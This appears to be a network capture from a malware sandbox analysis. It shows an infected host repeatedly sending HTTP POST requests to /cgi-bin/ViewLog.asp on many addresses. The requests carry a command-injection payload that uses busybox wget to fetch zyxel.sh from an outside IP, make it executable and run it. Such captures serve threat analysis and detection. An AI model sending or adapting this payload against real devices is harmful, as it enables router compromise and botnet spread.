62 39 31 22 3e 20 3c 64 69 76 20 69 64 3d 22 74 6f 70 22 20 63 6c 61 73 73 3d 22 66 72 61 6d 65 22 3e 20 3c 73 70 61 6e 20 69 64 3d 22 73 7a 22 20 63 6c 61 73 73 3d 22 68 69 64 22 3e 3c 2f 73 70 61 6e 3e 3c 68 31 3e 44 42 39 31 2d 54 58 20 2d 20 43 6f 6d 70 61 63 74 20 49 50 20 41 75 64 69 6f 20 45 6e 63 6f 64 65 72 3c 62 3e 20 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3c 2f 62 3e 3c 2f 68 31 3e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 65 76 61 62 72 6f 61 64 63 61 73 74 2e 63 6f 6d 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 20 3c 69 6d 67 20 73 72 63 3d 22 69 6d 67 2f 64 62 5f 6c 6f 67 6f 2e 73 76 67 22 20 69 64 3d 22 6c 6f 67 6f 22 20 61 6c 74 3d 22 44 45 56 41 20 42 72 6f 61 64 63 61 73 74 20 4c 74 64 2e 22 2f 3e 20 3c 2f 61 3e 20 3c 2f 64 69 76 3e 20 3c 64 69 76 20 69 64 3d 22 77 72 61 70 22 3e 20 3c 64 69 76 20 69 64 3d 22 6d 65 74 65 72 22 20 63 6c 61 73 73 3d 22 66 72 61 6d 65 22 3e 20 3c 64 69 76 20 69 64 3d 22 69 66 72 6d 6d 65 74 65 72 22 3e 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 69 66 72 6d 6d 74
                                                      Data Ascii: <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"/> <title>BrindisiTX - DB91-TX</title> <link rel="stylesheet" href="s.css"/> <link rel="stylesheet" href="main.css"/> <script type="text/javascript" src="ses.ssi"></script> <script type="text/javascript" src="js/jquery.js"></script> <script type="text/javascript" src="js/jquery.devaext.js"></script> <script type="text/javascript" src="js/main.js"></script> <script type="text/javascript" src="js/params.js"></script> </head> <body onload="init();"> <noscript><h6 style="text-align:center; position:relative; z-index: 1000; border:1px solid #000;">Your browser must support JavaScript in order to use all pages on this device!</h6></noscript> <div id="outer" class="frame db91"> <div id="top" class="frame"> <span id="sz" class="hid"></span><h1>DB91-TX - Compact IP Audio Encoder<b> Configuration</b></h1> <a href="http://www.devabroadcast.com" target="_blank"> <img src="img/db_logo.svg" id="logo" alt="DEVA Broadcast Ltd."/> </a> </div> <div id="wrap"> <div id="meter" class="frame"> <div id="ifrmmeter"> <iframe id="ifrmmt


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      373192.168.2.154671094.121.73.438080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:44.518697023 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      374192.168.2.155823494.123.139.2128080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:44.518841028 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      375192.168.2.154666631.200.123.1778080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:44.520154953 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      376192.168.2.154401485.130.206.1538080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:44.625536919 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:44.973697901 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      377192.168.2.1543690107.163.234.18823
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:44.645443916 CET165INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 39 3a 33 39 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:29:39Auth Result: .


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      378192.168.2.1543708107.163.234.18823
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:45.045234919 CET165INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 39 3a 33 39 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:29:39Auth Result: .


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      379192.168.2.155598685.214.146.1278080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:45.278279066 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:46.457700968 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:47.833597898 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:48.052784920 CET502INHTTP/1.1 400 Bad Request
                                                      Content-Type: text/html; charset=us-ascii
                                                      Server: Microsoft-HTTPAPI/2.0
                                                      Date: Wed, 14 Feb 2024 08:29:47 GMT
                                                      Connection: close
                                                      Content-Length: 311
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      380192.168.2.1543710107.163.234.18823
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:45.359848976 CET165INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 39 3a 33 39 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:29:39Auth Result: .


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      381192.168.2.1543714107.163.234.18823
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:45.681118965 CET165INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 39 3a 34 30 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:29:40Auth Result: .


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      382192.168.2.1543722107.163.234.18823
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:46.049948931 CET165INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 39 3a 34 30 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:29:40Auth Result: .


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      383192.168.2.1543726107.163.234.18823
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:46.386327028 CET165INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 39 3a 34 30 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:29:40Auth Result: .


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      384192.168.2.1543732107.163.234.18823
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:46.776467085 CET165INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 39 3a 34 31 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:29:41Auth Result: .


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      385192.168.2.1543736107.163.234.18823
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:47.085408926 CET165INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 39 3a 34 31 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:29:41Auth Result: .


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      386192.168.2.1543740107.163.234.18823
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:47.440088987 CET165INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 39 3a 34 31 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:29:41Auth Result: .


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      387192.168.2.154332485.122.213.2328080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:47.447854996 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      388192.168.2.154574431.20.232.338080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:47.662065029 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      389192.168.2.155684294.70.168.1158080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:47.686043024 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      390192.168.2.153867285.122.223.2348080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:47.694886923 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      391192.168.2.155424294.120.58.958080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:47.695034027 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      392192.168.2.155869062.29.93.1098080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:47.696420908 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      393192.168.2.154038462.29.73.1118080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:47.696592093 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      394192.168.2.156059694.122.206.2038080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:47.697782040 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      395192.168.2.1543758107.163.234.18823
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:47.767693996 CET165INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 39 3a 34 32 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e
